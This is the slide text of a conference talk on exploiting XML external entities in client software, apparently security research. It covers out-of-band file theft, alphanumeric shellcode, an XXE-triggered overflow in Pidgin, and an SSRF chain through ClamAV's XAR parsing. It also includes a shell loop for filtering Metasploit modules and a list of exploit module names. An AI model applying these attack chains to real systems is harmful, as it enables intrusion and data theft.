exploitable markup language
TRANSCRIPT
<?xml version=“1.0”?><DOCTYPE presentation [<!ENTITY HacktivityLogo SYSTEM “http://hacktivity.com/logo.png”> ]><presentation>
<logos>&HacktivityLogo; </logos><title>
eXploitable Markup Language</title>
<speakers>
<speaker Name=“Rajtmár Ákos”>
<email>[email protected]</email>
</speaker>
<speaker Name=“Szakály Tamás”>
<email>[email protected]</email>
<twitter>@sghctoma</twitter>
</speaker>
</speakers>
</presentaion>
Possible Hacktivity topics
How secure are today’s games?
Possible vulns in the EventLog subsystem of recent Windows systems.
The security of smart houses.
Well known XML attacks
XSLT-related
XInclude attacks
Entity-based attacks
• Billion laughs
• XXE
Everybody should read “XML Schema, DTD, and Entity Attacks” by VSR
Lots of XML-related web application attacks.
But the web is not the whole world. (not yet, anyway :) )
Won’t show any new XML vulnerabilities.
DON’Ts
DOs
Show exciting ways to exploit
Deal with the client side
Deal with XML-derivatives, and files with embedded XML parts
There are tons of these.
Often people don’t even realize they are dealing with XML
Some examples: X3D, CML, BeerXML, GPX, OpenDocument, EPUB, you name it.
XML entities
What are “entities” in XML-world?
OK, what are “external entities”?
http://www.w3.org/TR/2006/REC-xml11-20060816/#sec-entity-decl
XXE Intro
Most basic XXE: include resources
App has to display something from the XML
Interesting protocol handlers
jar:// extract file from given .jar
file:// directory list
• php:// with filters (base64 encode a file)
Special type of entity
Using % instead of &
More flexible
Declaration of external DTD
Can not be used in XML body
XML syntax is not a must
DTD conformity
Parameter entities
Non XML conform content
combine.dtd:
<![CDATA[ ]]>
Sending local file content
External parameter entity
Different protocol handlers
FTP, HTTP, FILE
Differences in implementation
Out-of-Bounds
XXE meets inter-protocol exploitation
RequirementsEncapsulationError tolerance
Main difficulty: limited character setLet’s check some XML parsers’ badchars
Internet Explorer• only ASCII• URL-encodes some char (e.g. space -> %20)• Cuts newlines
Visual Studio• URL-encodes every non alphanumeric chars
Trigger BoF via XXE
http://exploit-db.com/exploits/31789
Alphanum shellcode
Restricted to alphanumeric characters
UTF-8 too!!
Metasploit Framework
Encoders: x86/alpha_mixed, x86/alpha_upper
Useful options: BufferRegister, AllowWin32SEH
The payload
qB8w
Need “jmp esp” with an ASCII-only address
0x77384271 in big endian is qB8w
Installed Pidgin
Jabber configured
accounts.xml
Request external DTD
Generating mailer payload
Sending malicious content
Authenticated as user
Inter protocol SMTPloitation
Garmin Training Center
+ Not bothering with \n
- Yet not able to evaluate &variables;
Possible implementation issue
Visual Studio 2012
+ Ability to evaluate &variables;
- A great fan of URL encoding
Permanent fail?
Slight possibility of using Garmin
I believe I saw it working
Finding another \n application
Visual Studio can be „controlled”
Sending multiple files
Delivering more attacks
Not at all
XXE the AV!
Original idea: .docx vs. virus scanners
Grepped ClamAV’s source for “xml”
It uses libxml2 to open XAR archives
basically an archive format with compressed XML metadata
What other AV’s know this format?
AVGAd-AwareAvastAviraBitDefenderDrWebESET-NOD32Emsisoft
F-SecureGdataKasperskyNANO-AntivirusQihoo-360nProtectMicroWorld-eScan
EICAR string: X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
XARd it, and sent to VirusTotal
Besides ClamAV, these can deal with XAR:
There Can Be Only One
AVs use XML parsers without knowledge of DTD
Except ClamAV• Only recent versions >= 0.98.1
So let’s hack ClamAV!
XAR format
XAR hexdump
PoC
Python script to create XARs with custom XML
Simple XML with HTTP external entity:
Scanned it with clamscan...
... and it worked!
&Some haxx0r stuff;
libxml2 limitation: very strict URI checkingfor example, no newlines allowed
OOB attacks are very-very limitedonly files without newlines can be stolen.
SSRF is our Super Mushroomonly GET request
only HTTP
payload cannot contain non-ASCII chars
Finding suitable exploits
cat ~/msf_http.txt |while read line; do grep -q -E -i "443|post|ssl" $line;if[[ $? -ne 0 ]]; then
echo $line;fi;
done > ~/msf_http_nossl_nopost.txt
linux/http/esva_exec
linux/http/dreambox_openpli_shell
linux/http/fritzbox_echo_exec
linux/http/symantec_web_gateway_lfi
linux/http/symantec_web_gateway_pbcontrol
linux/http/ddwrt_cgibin_exec
multi/http/struts_code_exec
multi/http/vtiger_install_rce
multi/http/v0pcr3w_exec
multi/http/snortreport_exec
multi/http/spree_search_exec
multi/http/phptax_exec
multi/http/gitorious_graph
multi/http/familycms_less_exec
multi/http/gestioip_exec
multi/http/freenas_exec_raw
multi/http/ajaxplorer_checkinstall_exec
multi/http/spree_searchlogic_exec
multi/http/oracle_reports_rce
multi/http/mobilecartly_upload_exec
unix/http/freepbx_callmenum
unix/webapp/cacti_graphimage_exec
unix/webapp/awstats_configdir_exec
unix/webapp/barracuda_img_exec
unix/webapp/invision_pboard_unserialize_exec
unix/webapp/basilic_diff_exec
unix/webapp/awstats_migrate_exec
unix/webapp/google_proxystylesheet_exec
unix/webapp/base_qry_common
unix/webapp/tikiwiki_graph_formula_exec
unix/webapp/mambo_cache_lite
unix/webapp/awstatstotals_multisort
unix/webapp/openview_connectednodes_exec
unix/webapp/php_charts_exec
unix/webapp/php_vbulletin_template
unix/webapp/freepbx_config_exec
unix/webapp/twiki_search
unix/webapp/twiki_history
unix/webapp/mitel_awc_exec
unix/webapp/instantcms_exec
unix/webapp/redmine_scm_exec
windows/http/sap_configservlet_exec_noauth
Our choice for the demo
unix/webapp/freepbx_config_exec
Further research
Games that use XML for game saves, network communication• Skyrim• Flight Gear
XML metadata• rdf
Binary XML parsers• Cwxml• OpenEXI• Exifficient• AgileDelta• Window EventLog format (since Vista)
Network Configuration Protocol (NETCONF)XML databases
• IBM DB2• Oracle• MSSQL
THX